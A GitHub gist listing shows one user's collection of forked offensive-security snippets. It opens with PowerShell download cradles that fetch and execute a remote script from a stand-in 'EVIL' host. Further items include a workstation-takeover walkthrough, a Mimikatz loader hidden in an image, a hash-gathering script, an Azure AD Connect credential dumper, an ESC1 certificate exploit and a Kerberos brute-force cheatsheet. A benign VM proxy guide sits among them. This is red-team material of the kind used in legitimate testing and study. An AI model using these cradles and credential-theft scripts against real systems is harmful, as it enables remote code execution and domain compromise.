Skip to content

Instantly share code, notes, and snippets.

### Keybase proof
I hereby claim:
* I am d4rkz3ro on github.
* I am sageyev (https://keybase.io/sageyev) on keybase.
* I have a public key ASDnFT5MR4aJjCgaAVnamCtGsr0hwBiHFyUmTWyxqeDaZgo
To claim this, I am signing this object:
@D4rkz3rO
D4rkz3rO / DownloadCradles.ps1
Created July 19, 2021 19:10 — forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@D4rkz3rO
D4rkz3rO / Workstation-Takeover.md
Created July 26, 2021 02:50 — forked from gladiatx0r/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@D4rkz3rO
D4rkz3rO / skullkatz.cs
Created September 1, 2021 19:48
SkullKatz - Execute Mimikatz from an image
using System;
using System.IO;
using System.Net;
using System.Text;
using System.IO.Compression;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Runtime.InteropServices;
@D4rkz3rO
D4rkz3rO / gather.sh
Created September 24, 2021 15:41 — forked from seajaysec/gather.sh
Parses output from CrackMapExec, CrackMapExtreme, Responder, PCredz, and NTLMRelayX.py into aggregate files of hashes and plaintext output
#!/bin/bash
# This script assumes Responder is in /opt/Responder
# Error messages begone!
exec 2>/dev/null
# Hardcoded location for script output files
OUTDIR=${HOME}'/working/loot/gathered'
# Hardcoded location for ntlmrelayx's .sam file output directory
NTLMRELAY=${HOME}'/working/loot/ntlmrelay'
@D4rkz3rO
D4rkz3rO / azuread_decrypt_msol_v2.ps1
Created January 10, 2023 05:41 — forked from xpn/azuread_decrypt_msol_v2.ps1
Updated method of dumping the MSOL service account (which allows a DCSync) used by Azure AD Connect Sync
Write-Host "AD Connect Sync Credential Extract v2 (@_xpn_)"
Write-Host "`t[ Updated to support new cryptokey storage method ]`n"
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"
try {
$client.Open()
} catch {
Write-Host "[!] Could not connect to localdb..."
return

Setup transparent proxy with VMware Fusion

  1. Add network (vmnet3) to VMware Fusion
    1. sudo vi /Library/Preferences/VMware\ Fusion/networking
       answer VNET_1_HOSTONLY_SUBNET 172.16.92.0
       answer VNET_1_VIRTUAL_ADAPTER yes
       answer VNET_1_VIRTUAL_ADAPTER_ADDR 172.16.92.1
      +answer VNET_3_DHCP yes
      +answer VNET_3_DHCP_PARAM_DNS_ADDR 172.16.12.1
      +answer VNET_3_DHCP_PARAM_ROUTERS 172.16.12.1
@D4rkz3rO
D4rkz3rO / proxify-vmware-fusion-vm.md
Created February 10, 2023 05:11 — forked from koenrh/proxify-vmware-fusion-vm.md
This is a little guide that helps you to "proxify" a VMware Fusion virtual machine on macOS. This can be useful if you want to isolate and analyse web traffic to/from an application by running it in a VM.

Proxifying a VMware Fusion virtual machine on macOS

This is a little guide that helps you to "proxify" a VMware Fusion virtual machine on macOS. This can be useful if you want to isolate and analyse web traffic to/from an application by running it in a VM.

Prerequisites

  • VMware Fusion 11 Pro
  • Transparent HTTP/HTTPS proxy (e.g. Burp Suite Pro or mitmproxy)
@D4rkz3rO
D4rkz3rO / esc1.ps1
Created February 24, 2023 06:07 — forked from b4cktr4ck2/esc1.ps1
PowerShell script to exploit ESC1/retrieve your own NTLM password hash.
#Thank you @NotMedic for troubleshooting/validating stuff!
$password = Read-Host -Prompt "Enter Password"
#^^ Feel free to hardcode this for running in a beacon/not retyping it all the time!
$server = "admin" #This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now.
$CERTPATH = "C:\Users\lowpriv\Desktop\" #Where do you want the cert requests to be stored?
$CAFQDN = "dc01.alexlab.local" #hostname of underlying CA box.
$CASERVER = "alexlab-dc01-ca" #CA name.
$CA = $CAFQDN + "\" + $CASERVER
@D4rkz3rO
D4rkz3rO / kerberos_attacks_cheatsheet.md
Created April 14, 2023 14:42 — forked from gladiatx0r/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module: